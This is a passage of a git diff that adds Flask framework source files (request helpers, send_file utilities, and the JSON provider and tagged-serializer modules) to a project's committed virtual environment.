in a view function." + ) + with ctx: + # Dummy sentinel. Has to be inside the context block or we're + # not actually keeping the context around. + yield None + + # The try/finally is here so that if someone passes a WSGI level + # iterator in we're still running the cleanup logic. Generators + # don't need that because they are closed on their destruction + # automatically. + try: + yield from gen + finally: + if hasattr(gen, "close"): + gen.close() + + # The trick is to start the generator. Then the code execution runs until + # the first dummy None is yielded at which point the context was already + # pushed. This item is discarded. Then when the iteration continues the + # real generator is executed. + wrapped_g = generator() + next(wrapped_g) + return wrapped_g + + +def make_response(*args: t.Any) -> Response: + """Sometimes it is necessary to set additional headers in a view. Because + views do not have to return response objects but can return a value that + is converted into a response object by Flask itself, it becomes tricky to + add headers to it. This function can be called instead of using a return + and you will get a response object which you can use to attach headers. + + If view looked like this and you want to add a new header:: + + def index(): + return render_template('index.html', foo=42) + + You can now do something like this:: + + def index(): + response = make_response(render_template('index.html', foo=42)) + response.headers['X-Parachutes'] = 'parachutes are cool' + return response + + This function accepts the very same arguments you can return from a + view function. This for example creates a response with a 404 error + code:: + + response = make_response(render_template('not_found.html'), 404) + + The other use case of this function is to force the return value of a + view function into a response which is helpful with view + decorators:: + + response = make_response(view_function()) + response.headers['X-Parachutes'] = 'parachutes are cool' + + Internally this function does the following things: + + - if no arguments are passed, it creates a new response argument + - if one argument is passed, :meth:`flask.Flask.make_response` + is invoked with it. + - if more than one argument is passed, the arguments are passed + to the :meth:`flask.Flask.make_response` function as tuple. + + .. versionadded:: 0.6 + """ + if not args: + return current_app.response_class() + if len(args) == 1: + args = args[0] + return current_app.make_response(args) # type: ignore + + +def url_for( + endpoint: str, + *, + _anchor: str | None = None, + _method: str | None = None, + _scheme: str | None = None, + _external: bool | None = None, + **values: t.Any, +) -> str: + """Generate a URL to the given endpoint with the given values. + + This requires an active request or application context, and calls + :meth:`current_app.url_for() `. See that method + for full documentation. + + :param endpoint: The endpoint name associated with the URL to + generate. If this starts with a ``.``, the current blueprint + name (if any) will be used. + :param _anchor: If given, append this as ``#anchor`` to the URL. + :param _method: If given, generate the URL associated with this + method for the endpoint. + :param _scheme: If given, the URL will have this scheme if it is + external. + :param _external: If given, prefer the URL to be internal (False) or + require it to be external (True). External URLs include the + scheme and domain. When not in an active request, URLs are + external by default. + :param values: Values to use for the variable parts of the URL rule. + Unknown keys are appended as query string arguments, like + ``?a=b&c=d``. + + .. versionchanged:: 2.2 + Calls ``current_app.url_for``, allowing an app to override the + behavior. + + .. versionchanged:: 0.10 + The ``_scheme`` parameter was added. + + .. versionchanged:: 0.9 + The ``_anchor`` and ``_method`` parameters were added. + + .. versionchanged:: 0.9 + Calls ``app.handle_url_build_error`` on build errors. + """ + return current_app.url_for( + endpoint, + _anchor=_anchor, + _method=_method, + _scheme=_scheme, + _external=_external, + **values, + ) + + +def redirect( + location: str, code: int = 302, Response: type[BaseResponse] | None = None +) -> BaseResponse: + """Create a redirect response object. + + If :data:`~flask.current_app` is available, it will use its + :meth:`~flask.Flask.redirect` method, otherwise it will use + :func:`werkzeug.utils.redirect`. + + :param location: The URL to redirect to. + :param code: The status code for the redirect. + :param Response: The response class to use. Not used when + ``current_app`` is active, which uses ``app.response_class``. + + .. versionadded:: 2.2 + Calls ``current_app.redirect`` if available instead of always + using Werkzeug's default ``redirect``. + """ + if current_app: + return current_app.redirect(location, code=code) + + return _wz_redirect(location, code=code, Response=Response) + + +def abort(code: int | BaseResponse, *args: t.Any, **kwargs: t.Any) -> t.NoReturn: + """Raise an :exc:`~werkzeug.exceptions.HTTPException` for the given + status code. + + If :data:`~flask.current_app` is available, it will call its + :attr:`~flask.Flask.aborter` object, otherwise it will use + :func:`werkzeug.exceptions.abort`. + + :param code: The status code for the exception, which must be + registered in ``app.aborter``. + :param args: Passed to the exception. + :param kwargs: Passed to the exception. + + .. versionadded:: 2.2 + Calls ``current_app.aborter`` if available instead of always + using Werkzeug's default ``abort``. + """ + if current_app: + current_app.aborter(code, *args, **kwargs) + + _wz_abort(code, *args, **kwargs) + + +def get_template_attribute(template_name: str, attribute: str) -> t.Any: + """Loads a macro (or variable) a template exports. This can be used to + invoke a macro from within Python code. If you for example have a + template named :file:`_cider.html` with the following contents: + + .. sourcecode:: html+jinja + + {% macro hello(name) %}Hello {{ name }}!{% endmacro %} + + You can access this from Python code like this:: + + hello = get_template_attribute('_cider.html', 'hello') + return hello('World') + + .. versionadded:: 0.2 + + :param template_name: the name of the template + :param attribute: the name of the variable of macro to access + """ + return getattr(current_app.jinja_env.get_template(template_name).module, attribute) + + +def flash(message: str, category: str = "message") -> None: + """Flashes a message to the next request. In order to remove the + flashed message from the session and to display it to the user, + the template has to call :func:`get_flashed_messages`. + + .. versionchanged:: 0.3 + `category` parameter added. + + :param message: the message to be flashed. + :param category: the category for the message. The following values + are recommended: ``'message'`` for any kind of message, + ``'error'`` for errors, ``'info'`` for information + messages and ``'warning'`` for warnings. However any + kind of string can be used as category. + """ + # Original implementation: + # + # session.setdefault('_flashes', []).append((category, message)) + # + # This assumed that changes made to mutable structures in the session are + # always in sync with the session object, which is not true for session + # implementations that use external storage for keeping their keys/values. + flashes = session.get("_flashes", []) + flashes.append((category, message)) + session["_flashes"] = flashes + app = current_app._get_current_object() # type: ignore + message_flashed.send( + app, + _async_wrapper=app.ensure_sync, + message=message, + category=category, + ) + + +def get_flashed_messages( + with_categories: bool = False, category_filter: t.Iterable[str] = () +) -> list[str] | list[tuple[str, str]]: + """Pulls all flashed messages from the session and returns them. + Further calls in the same request to the function will return + the same messages. By default just the messages are returned, + but when `with_categories` is set to ``True``, the return value will + be a list of tuples in the form ``(category, message)`` instead. + + Filter the flashed messages to one or more categories by providing those + categories in `category_filter`. This allows rendering categories in + separate html blocks. The `with_categories` and `category_filter` + arguments are distinct: + + * `with_categories` controls whether categories are returned with message + text (``True`` gives a tuple, where ``False`` gives just the message text). + * `category_filter` filters the messages down to only those matching the + provided categories. + + See :doc:`/patterns/flashing` for examples. + + .. versionchanged:: 0.3 + `with_categories` parameter added. + + .. versionchanged:: 0.9 + `category_filter` parameter added. + + :param with_categories: set to ``True`` to also receive categories. + :param category_filter: filter of categories to limit return values. Only + categories in the list will be returned. + """ + flashes = request_ctx.flashes + if flashes is None: + flashes = session.pop("_flashes") if "_flashes" in session else [] + request_ctx.flashes = flashes + if category_filter: + flashes = list(filter(lambda f: f[0] in category_filter, flashes)) + if not with_categories: + return [x[1] for x in flashes] + return flashes + + +def _prepare_send_file_kwargs(**kwargs: t.Any) -> dict[str, t.Any]: + if kwargs.get("max_age") is None: + kwargs["max_age"] = current_app.get_send_file_max_age + + kwargs.update( + environ=request.environ, + use_x_sendfile=current_app.config["USE_X_SENDFILE"], + response_class=current_app.response_class, + _root_path=current_app.root_path, # type: ignore + ) + return kwargs + + +def send_file( + path_or_file: os.PathLike | str | t.BinaryIO, + mimetype: str | None = None, + as_attachment: bool = False, + download_name: str | None = None, + conditional: bool = True, + etag: bool | str = True, + last_modified: datetime | int | float | None = None, + max_age: None | (int | t.Callable[[str | None], int | None]) = None, +) -> Response: + """Send the contents of a file to the client. + + The first argument can be a file path or a file-like object. Paths + are preferred in most cases because Werkzeug can manage the file and + get extra information from the path. Passing a file-like object + requires that the file is opened in binary mode, and is mostly + useful when building a file in memory with :class:`io.BytesIO`. + + Never pass file paths provided by a user. The path is assumed to be + trusted, so a user could craft a path to access a file you didn't + intend. Use :func:`send_from_directory` to safely serve + user-requested paths from within a directory. + + If the WSGI server sets a ``file_wrapper`` in ``environ``, it is + used, otherwise Werkzeug's built-in wrapper is used. Alternatively, + if the HTTP server supports ``X-Sendfile``, configuring Flask with + ``USE_X_SENDFILE = True`` will tell the server to send the given + path, which is much more efficient than reading it in Python. + + :param path_or_file: The path to the file to send, relative to the + current working directory if a relative path is given. + Alternatively, a file-like object opened in binary mode. Make + sure the file pointer is seeked to the start of the data. + :param mimetype: The MIME type to send for the file. If not + provided, it will try to detect it from the file name. + :param as_attachment: Indicate to a browser that it should offer to + save the file instead of displaying it. + :param download_name: The default name browsers will use when saving + the file. Defaults to the passed file name. + :param conditional: Enable conditional and range responses based on + request headers. Requires passing a file path and ``environ``. + :param etag: Calculate an ETag for the file, which requires passing + a file path. Can also be a string to use instead. + :param last_modified: The last modified time to send for the file, + in seconds. If not provided, it will try to detect it from the + file path. + :param max_age: How long the client should cache the file, in + seconds. If set, ``Cache-Control`` will be ``public``, otherwise + it will be ``no-cache`` to prefer conditional caching. + + .. versionchanged:: 2.0 + ``download_name`` replaces the ``attachment_filename`` + parameter. If ``as_attachment=False``, it is passed with + ``Content-Disposition: inline`` instead. + + .. versionchanged:: 2.0 + ``max_age`` replaces the ``cache_timeout`` parameter. + ``conditional`` is enabled and ``max_age`` is not set by + default. + + .. versionchanged:: 2.0 + ``etag`` replaces the ``add_etags`` parameter. It can be a + string to use instead of generating one. + + .. versionchanged:: 2.0 + Passing a file-like object that inherits from + :class:`~io.TextIOBase` will raise a :exc:`ValueError` rather + than sending an empty file. + + .. versionadded:: 2.0 + Moved the implementation to Werkzeug. This is now a wrapper to + pass some Flask-specific arguments. + + .. versionchanged:: 1.1 + ``filename`` may be a :class:`~os.PathLike` object. + + .. versionchanged:: 1.1 + Passing a :class:`~io.BytesIO` object supports range requests. + + .. versionchanged:: 1.0.3 + Filenames are encoded with ASCII instead of Latin-1 for broader + compatibility with WSGI servers. + + .. versionchanged:: 1.0 + UTF-8 filenames as specified in :rfc:`2231` are supported. + + .. versionchanged:: 0.12 + The filename is no longer automatically inferred from file + objects. If you want to use automatic MIME and etag support, + pass a filename via ``filename_or_fp`` or + ``attachment_filename``. + + .. versionchanged:: 0.12 + ``attachment_filename`` is preferred over ``filename`` for MIME + detection. + + .. versionchanged:: 0.9 + ``cache_timeout`` defaults to + :meth:`Flask.get_send_file_max_age`. + + .. versionchanged:: 0.7 + MIME guessing and etag support for file-like objects was + removed because it was unreliable. Pass a filename if you are + able to, otherwise attach an etag yourself. + + .. versionchanged:: 0.5 + The ``add_etags``, ``cache_timeout`` and ``conditional`` + parameters were added. The default behavior is to add etags. + + .. versionadded:: 0.2 + """ + return werkzeug.utils.send_file( # type: ignore[return-value] + **_prepare_send_file_kwargs( + path_or_file=path_or_file, + environ=request.environ, + mimetype=mimetype, + as_attachment=as_attachment, + download_name=download_name, + conditional=conditional, + etag=etag, + last_modified=last_modified, + max_age=max_age, + ) + ) + + +def send_from_directory( + directory: os.PathLike | str, + path: os.PathLike | str, + **kwargs: t.Any, +) -> Response: + """Send a file from within a directory using :func:`send_file`. + + .. code-block:: python + + @app.route("/uploads/") + def download_file(name): + return send_from_directory( + app.config['UPLOAD_FOLDER'], name, as_attachment=True + ) + + This is a secure way to serve files from a folder, such as static + files or uploads. Uses :func:`~werkzeug.security.safe_join` to + ensure the path coming from the client is not maliciously crafted to + point outside the specified directory. + + If the final path does not point to an existing regular file, + raises a 404 :exc:`~werkzeug.exceptions.NotFound` error. + + :param directory: The directory that ``path`` must be located under, + relative to the current application's root path. + :param path: The path to the file to send, relative to + ``directory``. + :param kwargs: Arguments to pass to :func:`send_file`. + + .. versionchanged:: 2.0 + ``path`` replaces the ``filename`` parameter. + + .. versionadded:: 2.0 + Moved the implementation to Werkzeug. This is now a wrapper to + pass some Flask-specific arguments. + + .. versionadded:: 0.5 + """ + return werkzeug.utils.send_from_directory( # type: ignore[return-value] + directory, path, **_prepare_send_file_kwargs(**kwargs) + ) + + +def get_root_path(import_name: str) -> str: + """Find the root path of a package, or the path that contains a + module. If it cannot be found, returns the current working + directory. + + Not to be confused with the value returned by :func:`find_package`. + + :meta private: + """ + # Module already imported and has a file attribute. Use that first. + mod = sys.modules.get(import_name) + + if mod is not None and hasattr(mod, "__file__") and mod.__file__ is not None: + return os.path.dirname(os.path.abspath(mod.__file__)) + + # Next attempt: check the loader. + try: + spec = importlib.util.find_spec(import_name) + + if spec is None: + raise ValueError + except (ImportError, ValueError): + loader = None + else: + loader = spec.loader + + # Loader does not exist or we're referring to an unloaded main + # module or a main module without path (interactive sessions), go + # with the current working directory. + if loader is None: + return os.getcwd() + + if hasattr(loader, "get_filename"): + filepath = loader.get_filename(import_name) + else: + # Fall back to imports. + __import__(import_name) + mod = sys.modules[import_name] + filepath = getattr(mod, "__file__", None) + + # If we don't have a file path it might be because it is a + # namespace package. In this case pick the root path from the + # first module that is contained in the package. + if filepath is None: + raise RuntimeError( + "No root path can be found for the provided module" + f" {import_name!r}. This can happen because the module" + " came from an import hook that does not provide file" + " name information or because it's a namespace package." + " In this case the root path needs to be explicitly" + " provided." + ) + + # filepath is import_name.py for a module, or __init__.py for a package. + return os.path.dirname(os.path.abspath(filepath)) + + +@lru_cache(maxsize=None) +def _split_blueprint_path(name: str) -> list[str]: + out: list[str] = [name] + + if "." in name: + out.extend(_split_blueprint_path(name.rpartition(".")[0])) + + return out diff --git a/env/Lib/site-packages/flask/json/__init__.py b/env/Lib/site-packages/flask/json/__init__.py new file mode 100644 index 00000000..f15296fe --- /dev/null +++ b/env/Lib/site-packages/flask/json/__init__.py @@ -0,0 +1,170 @@ +from __future__ import annotations + +import json as _json +import typing as t + +from ..globals import current_app +from .provider import _default + +if t.TYPE_CHECKING: # pragma: no cover + from ..wrappers import Response + + +def dumps(obj: t.Any, **kwargs: t.Any) -> str: + """Serialize data as JSON. + + If :data:`~flask.current_app` is available, it will use its + :meth:`app.json.dumps() ` + method, otherwise it will use :func:`json.dumps`. + + :param obj: The data to serialize. + :param kwargs: Arguments passed to the ``dumps`` implementation. + + .. versionchanged:: 2.3 + The ``app`` parameter was removed. + + .. versionchanged:: 2.2 + Calls ``current_app.json.dumps``, allowing an app to override + the behavior. + + .. versionchanged:: 2.0.2 + :class:`decimal.Decimal` is supported by converting to a string. + + .. versionchanged:: 2.0 + ``encoding`` will be removed in Flask 2.1. + + .. versionchanged:: 1.0.3 + ``app`` can be passed directly, rather than requiring an app + context for configuration. + """ + if current_app: + return current_app.json.dumps(obj, **kwargs) + + kwargs.setdefault("default", _default) + return _json.dumps(obj, **kwargs) + + +def dump(obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None: + """Serialize data as JSON and write to a file. + + If :data:`~flask.current_app` is available, it will use its + :meth:`app.json.dump() ` + method, otherwise it will use :func:`json.dump`. + + :param obj: The data to serialize. + :param fp: A file opened for writing text. Should use the UTF-8 + encoding to be valid JSON. + :param kwargs: Arguments passed to the ``dump`` implementation. + + .. versionchanged:: 2.3 + The ``app`` parameter was removed. + + .. versionchanged:: 2.2 + Calls ``current_app.json.dump``, allowing an app to override + the behavior. + + .. versionchanged:: 2.0 + Writing to a binary file, and the ``encoding`` argument, will be + removed in Flask 2.1. + """ + if current_app: + current_app.json.dump(obj, fp, **kwargs) + else: + kwargs.setdefault("default", _default) + _json.dump(obj, fp, **kwargs) + + +def loads(s: str | bytes, **kwargs: t.Any) -> t.Any: + """Deserialize data as JSON. + + If :data:`~flask.current_app` is available, it will use its + :meth:`app.json.loads() ` + method, otherwise it will use :func:`json.loads`. + + :param s: Text or UTF-8 bytes. + :param kwargs: Arguments passed to the ``loads`` implementation. + + .. versionchanged:: 2.3 + The ``app`` parameter was removed. + + .. versionchanged:: 2.2 + Calls ``current_app.json.loads``, allowing an app to override + the behavior. + + .. versionchanged:: 2.0 + ``encoding`` will be removed in Flask 2.1. The data must be a + string or UTF-8 bytes. + + .. versionchanged:: 1.0.3 + ``app`` can be passed directly, rather than requiring an app + context for configuration. + """ + if current_app: + return current_app.json.loads(s, **kwargs) + + return _json.loads(s, **kwargs) + + +def load(fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any: + """Deserialize data as JSON read from a file. + + If :data:`~flask.current_app` is available, it will use its + :meth:`app.json.load() ` + method, otherwise it will use :func:`json.load`. + + :param fp: A file opened for reading text or UTF-8 bytes. + :param kwargs: Arguments passed to the ``load`` implementation. + + .. versionchanged:: 2.3 + The ``app`` parameter was removed. + + .. versionchanged:: 2.2 + Calls ``current_app.json.load``, allowing an app to override + the behavior. + + .. versionchanged:: 2.2 + The ``app`` parameter will be removed in Flask 2.3. + + .. versionchanged:: 2.0 + ``encoding`` will be removed in Flask 2.1. The file must be text + mode, or binary mode with UTF-8 bytes. + """ + if current_app: + return current_app.json.load(fp, **kwargs) + + return _json.load(fp, **kwargs) + + +def jsonify(*args: t.Any, **kwargs: t.Any) -> Response: + """Serialize the given arguments as JSON, and return a + :class:`~flask.Response` object with the ``application/json`` + mimetype. A dict or list returned from a view will be converted to a + JSON response automatically without needing to call this. + + This requires an active request or application context, and calls + :meth:`app.json.response() `. + + In debug mode, the output is formatted with indentation to make it + easier to read. This may also be controlled by the provider. + + Either positional or keyword arguments can be given, not both. + If no arguments are given, ``None`` is serialized. + + :param args: A single value to serialize, or multiple values to + treat as a list to serialize. + :param kwargs: Treat as a dict to serialize. + + .. versionchanged:: 2.2 + Calls ``current_app.json.response``, allowing an app to override + the behavior. + + .. versionchanged:: 2.0.2 + :class:`decimal.Decimal` is supported by converting to a string. + + .. versionchanged:: 0.11 + Added support for serializing top-level arrays. This was a + security risk in ancient browsers. See :ref:`security-json`. + + .. versionadded:: 0.2 + """ + return current_app.json.response(*args, **kwargs) diff --git a/env/Lib/site-packages/flask/json/provider.py b/env/Lib/site-packages/flask/json/provider.py new file mode 100644 index 00000000..3c22bc8f --- /dev/null +++ b/env/Lib/site-packages/flask/json/provider.py @@ -0,0 +1,216 @@ +from __future__ import annotations + +import dataclasses +import decimal +import json +import typing as t +import uuid +import weakref +from datetime import date + +from werkzeug.http import http_date + +if t.TYPE_CHECKING: # pragma: no cover + from ..sansio.app import App + from ..wrappers import Response + + +class JSONProvider: + """A standard set of JSON operations for an application. Subclasses + of this can be used to customize JSON behavior or use different + JSON libraries. + + To implement a provider for a specific library, subclass this base + class and implement at least :meth:`dumps` and :meth:`loads`. All + other methods have default implementations. + + To use a different provider, either subclass ``Flask`` and set + :attr:`~flask.Flask.json_provider_class` to a provider class, or set + :attr:`app.json ` to an instance of the class. + + :param app: An application instance. This will be stored as a + :class:`weakref.proxy` on the :attr:`_app` attribute. + + .. versionadded:: 2.2 + """ + + def __init__(self, app: App) -> None: + self._app = weakref.proxy(app) + + def dumps(self, obj: t.Any, **kwargs: t.Any) -> str: + """Serialize data as JSON. + + :param obj: The data to serialize. + :param kwargs: May be passed to the underlying JSON library. + """ + raise NotImplementedError + + def dump(self, obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None: + """Serialize data as JSON and write to a file. + + :param obj: The data to serialize. + :param fp: A file opened for writing text. Should use the UTF-8 + encoding to be valid JSON. + :param kwargs: May be passed to the underlying JSON library. + """ + fp.write(self.dumps(obj, **kwargs)) + + def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any: + """Deserialize data as JSON. + + :param s: Text or UTF-8 bytes. + :param kwargs: May be passed to the underlying JSON library. + """ + raise NotImplementedError + + def load(self, fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any: + """Deserialize data as JSON read from a file. + + :param fp: A file opened for reading text or UTF-8 bytes. + :param kwargs: May be passed to the underlying JSON library. + """ + return self.loads(fp.read(), **kwargs) + + def _prepare_response_obj( + self, args: tuple[t.Any, ...], kwargs: dict[str, t.Any] + ) -> t.Any: + if args and kwargs: + raise TypeError("app.json.response() takes either args or kwargs, not both") + + if not args and not kwargs: + return None + + if len(args) == 1: + return args[0] + + return args or kwargs + + def response(self, *args: t.Any, **kwargs: t.Any) -> Response: + """Serialize the given arguments as JSON, and return a + :class:`~flask.Response` object with the ``application/json`` + mimetype. + + The :func:`~flask.json.jsonify` function calls this method for + the current application. + + Either positional or keyword arguments can be given, not both. + If no arguments are given, ``None`` is serialized. + + :param args: A single value to serialize, or multiple values to + treat as a list to serialize. + :param kwargs: Treat as a dict to serialize. + """ + obj = self._prepare_response_obj(args, kwargs) + return self._app.response_class(self.dumps(obj), mimetype="application/json") + + +def _default(o: t.Any) -> t.Any: + if isinstance(o, date): + return http_date(o) + + if isinstance(o, (decimal.Decimal, uuid.UUID)): + return str(o) + + if dataclasses and dataclasses.is_dataclass(o): + return dataclasses.asdict(o) + + if hasattr(o, "__html__"): + return str(o.__html__()) + + raise TypeError(f"Object of type {type(o).__name__} is not JSON serializable") + + +class DefaultJSONProvider(JSONProvider): + """Provide JSON operations using Python's built-in :mod:`json` + library. Serializes the following additional data types: + + - :class:`datetime.datetime` and :class:`datetime.date` are + serialized to :rfc:`822` strings. This is the same as the HTTP + date format. + - :class:`uuid.UUID` is serialized to a string. + - :class:`dataclasses.dataclass` is passed to + :func:`dataclasses.asdict`. + - :class:`~markupsafe.Markup` (or any object with a ``__html__`` + method) will call the ``__html__`` method to get a string. + """ + + default: t.Callable[[t.Any], t.Any] = staticmethod( + _default + ) # type: ignore[assignment] + """Apply this function to any object that :meth:`json.dumps` does + not know how to serialize. It should return a valid JSON type or + raise a ``TypeError``. + """ + + ensure_ascii = True + """Replace non-ASCII characters with escape sequences. This may be + more compatible with some clients, but can be disabled for better + performance and size. + """ + + sort_keys = True + """Sort the keys in any serialized dicts. This may be useful for + some caching situations, but can be disabled for better performance. + When enabled, keys must all be strings, they are not converted + before sorting. + """ + + compact: bool | None = None + """If ``True``, or ``None`` out of debug mode, the :meth:`response` + output will not add indentation, newlines, or spaces. If ``False``, + or ``None`` in debug mode, it will use a non-compact representation. + """ + + mimetype = "application/json" + """The mimetype set in :meth:`response`.""" + + def dumps(self, obj: t.Any, **kwargs: t.Any) -> str: + """Serialize data as JSON to a string. + + Keyword arguments are passed to :func:`json.dumps`. Sets some + parameter defaults from the :attr:`default`, + :attr:`ensure_ascii`, and :attr:`sort_keys` attributes. + + :param obj: The data to serialize. + :param kwargs: Passed to :func:`json.dumps`. + """ + kwargs.setdefault("default", self.default) + kwargs.setdefault("ensure_ascii", self.ensure_ascii) + kwargs.setdefault("sort_keys", self.sort_keys) + return json.dumps(obj, **kwargs) + + def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any: + """Deserialize data as JSON from a string or bytes. + + :param s: Text or UTF-8 bytes. + :param kwargs: Passed to :func:`json.loads`. + """ + return json.loads(s, **kwargs) + + def response(self, *args: t.Any, **kwargs: t.Any) -> Response: + """Serialize the given arguments as JSON, and return a + :class:`~flask.Response` object with it. The response mimetype + will be "application/json" and can be changed with + :attr:`mimetype`. + + If :attr:`compact` is ``False`` or debug mode is enabled, the + output will be formatted to be easier to read. + + Either positional or keyword arguments can be given, not both. + If no arguments are given, ``None`` is serialized. + + :param args: A single value to serialize, or multiple values to + treat as a list to serialize. + :param kwargs: Treat as a dict to serialize. + """ + obj = self._prepare_response_obj(args, kwargs) + dump_args: dict[str, t.Any] = {} + + if (self.compact is None and self._app.debug) or self.compact is False: + dump_args.setdefault("indent", 2) + else: + dump_args.setdefault("separators", (",", ":")) + + return self._app.response_class( + f"{self.dumps(obj, **dump_args)}\n", mimetype=self.mimetype + ) diff --git a/env/Lib/site-packages/flask/json/tag.py b/env/Lib/site-packages/flask/json/tag.py new file mode 100644 index 00000000..91cc4412 --- /dev/null +++ b/env/Lib/site-packages/flask/json/tag.py @@ -0,0 +1,314 @@ +""" +Tagged JSON +~~~~~~~~~~~ + +A compact representation for lossless serialization of non-standard JSON +types. :class:`~flask.sessions.SecureCookieSessionInterface` uses this +to serialize the session data, but it may be useful in other places. It +can be extended to support other types. + +.. autoclass:: TaggedJSONSerializer + :members: + +.. autoclass:: JSONTag + :members: + +Let's see an example that adds support for +:class:`~collections.OrderedDict`. Dicts don't have an order in JSON, so +to handle this we will dump the items as a list of ``[key, value]`` +pairs. Subclass :class:`JSONTag` and give it the new key ``' od'`` to +identify the type. The session serializer processes dicts first, so +insert the new tag at the front of the order since ``OrderedDict`` must +be processed before ``dict``. + +.. code-block:: python + + from flask.json.tag import JSONTag + + class TagOrderedDict(JSONTag): + __slots__ = ('serializer',) + key = ' od' + + def check(self, value): + return isinstance(value, OrderedDict) + + def to_json(self, value): + return [[k, self.serializer.tag(v)] for k, v in iteritems(value)] + + def to_python(self, value): + return OrderedDict(value) + + app.session_interface.serializer.register(TagOrderedDict, index=0) +""" +from __future__ import annotations + +import typing as t +from base64 import b64decode +from base64 import b64encode +from datetime import datetime +from uuid import UUID + +from markupsafe import Markup +from werkzeug.http import http_date +from werkzeug.http import parse_date + +from ..json import dumps +from ..json import loads + + +class JSONTag: + """Base class for defining type tags for :class:`TaggedJSONSerializer`.""" + + __slots__ = ("serializer",) + + #: The tag to mark the serialized object with. If ``None``, this tag is + #: only used as an intermediate step during tagging. + key: str | None = None + + def __init__(self, serializer: TaggedJSONSerializer) -> None: + """Create a tagger for the given serializer.""" + self.serializer = serializer + + def check(self, value: t.Any) -> bool: + """Check if the given value should be tagged by this tag.""" + raise NotImplementedError + + def to_json(self, value: t.Any) -> t.Any: + """Convert the Python object to an object that is a valid JSON type. + The tag will be added later.""" + raise NotImplementedError + + def to_python(self, value: t.Any) -> t.Any: + """Convert the JSON representation back to the correct type. The tag + will already be removed.""" + raise NotImplementedError + + def tag(self, value: t.Any) -> t.Any: + """Convert the value to a valid JSON type and add the tag structure + around it.""" + return {self.key: self.to_json(value)} + + +class TagDict(JSONTag): + """Tag for 1-item dicts whose only key matches a registered tag. + + Internally, the dict key is suffixed with `__`, and the suffix is removed + when deserializing. + """ + + __slots__ = () + key = " di" + + def check(self, value: t.Any) -> bool: + return ( + isinstance(value, dict) + and len(value) == 1 + and next(iter(value)) in self.serializer.tags + ) + + def to_json(self, value: t.Any) -> t.Any: + key = next(iter(value)) + return {f"{key}__": self.serializer.tag(value[key])} + + def to_python(self, value: t.Any) -> t.Any: + key = next(iter(value)) + return {key[:-2]: value[key]} + + +class PassDict(JSONTag): + __slots__ = () + + def check(self, value: t.Any) -> bool: + return isinstance(value, dict) + + def to_json(self, value: t.Any) -> t.Any: + # JSON objects may only have string keys, so don't bother tagging the + # key here. + return {k: self.serializer.tag(v) for k, v in value.items()} + + tag = to_json + + +class TagTuple(JSONTag): + __slots__ = () + key = " t" + + def check(self, value: t.Any) -> bool: + return isinstance(value, tuple) + + def to_json(self, value: t.Any) -> t.Any: + return [self.serializer.tag(item) for item in value] + + def to_python(self, value: t.Any) -> t.Any: + return tuple(value) + + +class PassList(JSONTag): + __slots__ = () + + def check(self, value: t.Any) -> bool: + return isinstance(value, list) + + def to_json(self, value: t.Any) -> t.Any: + return [self.serializer.tag(item) for item in value] + + tag = to_json + + +class TagBytes(JSONTag): + __slots__ = () + key = " b" + + def check(self, value: t.Any) -> bool: + return isinstance(value, bytes) + + def to_json(self, value: t.Any) -> t.Any: + return b64encode(value).decode("ascii") + + def to_python(self, value: t.Any) -> t.Any: + return b64decode(value) + + +class TagMarkup(JSONTag): + """Serialize anything matching the :class:`~markupsafe.Markup` API by + having a ``__html__`` method to the result of that method. Always + deserializes to an instance of :class:`~markupsafe.Markup`.""" + + __slots__ = () + key = " m" + + def check(self, value: t.Any) -> bool: + return callable(getattr(value, "__html__", None)) + + def to_json(self, value: t.Any) -> t.Any: + return str(value.__html__()) + + def to_python(self, value: t.Any) -> t.Any: + return Markup(value) + + +class TagUUID(JSONTag): + __slots__ = () + key = " u" + + def check(self, value: t.Any) -> bool: + return isinstance(value, UUID) + + def to_json(self, value: t.Any) -> t.Any: + return value.hex + + def to_python(self, value: t.Any) -> t.Any: + return UUID(value) + + +class TagDateTime(JSONTag): + __slots__ = () + key = " d" + + def check(self, value: t.Any) -> bool: + return isinstance(value, datetime) + + def to_json(self, value: t.Any) -> t.Any: + return http_date(value) + + def to_python(self, value: t.Any) -> t.Any: + return parse_date(value) + + +class TaggedJSONSerializer: + """Serializer that uses a tag system to compactly represent objects that + are not JSON types. Passed as the intermediate serializer to + :class:`itsdangerous.Serializer`. + + The following extra types are supported: + + * :class:`dict` + * :class:`tuple` + * :class:`bytes` + * :class:`~markupsafe.Markup` + * :class:`~uuid.UUID` + * :class:`~datetime.datetime` + """ + + __slots__ = ("tags", "order") + + #: Tag classes to bind when creating the serializer. Other tags can be + #: added later using :meth:`~register`. + default_tags = [ + TagDict, + PassDict, + TagTuple, + PassList, + TagBytes, + TagMarkup, + TagUUID, + TagDateTime, + ] + + def __init__(self) -> None: + self.tags: dict[str, JSONTag] = {} + self.order: list[JSONTag] = [] + + for cls in self.default_tags: + self.register(cls) + + def register( + self, + tag_class: type[JSONTag], + force: bool = False, + index: int | None = None, + ) -> None: + """Register a new tag with this serializer. + + :param tag_class: tag class to register. Will be instantiated with this + serializer instance. + :param force: overwrite an existing tag. If false (default), a + :exc:`KeyError` is raised. + :param index: index to insert the new tag in the tag order. Useful when + the new tag is a special case of an existing tag. If ``None`` + (default), the tag is appended to the end of the order. + + :raise KeyError: if the tag key is already registered and ``force`` is + not true. + """ + tag = tag_class(self) + key = tag.key + + if key is not None: + if not force and key in self.tags: + raise KeyError(f"Tag '{key}' is already registered.") + + self.tags[key] = tag + + if index is None: + self.order.append(tag) + else: + self.order.insert(index, tag) + + def tag(self, value: t.Any) -> dict[str, t.Any]: + """Convert a value to a tagged representation if necessary.""" + for tag in self.order: + if tag.check(value): + return tag.tag(value) + + return value + + def untag(self, value: dict[str, t.Any]) -> t.Any: + """Convert a tagged representation back to the original type.""" + if len(value) != 1: + return value + + key = next(iter(value)) + + if key not in self.tags: + return value + + return self.tags[key].to_python(value[key]) + + def dumps(self, value: t.Any) -> str: + """Tag the value and dump it to a compact JSON string.""" + return dumps(self.tag(value), separators=(",", ":")) + + def loads(self, value: str) -> t.Any: + """Load data from a JSON string and deserialized any tagged objects.""" + return loads(value, object_hook=self.untag) diff --git a/env/Lib/site-packages/flask/logging.py b/env/Lib/site-packages/flask/logging.py new file mode 100644 index 00000000..b452f71f --- /dev/null +++ b/env/Lib/site-packages/flask/logging.py @@ -0,0 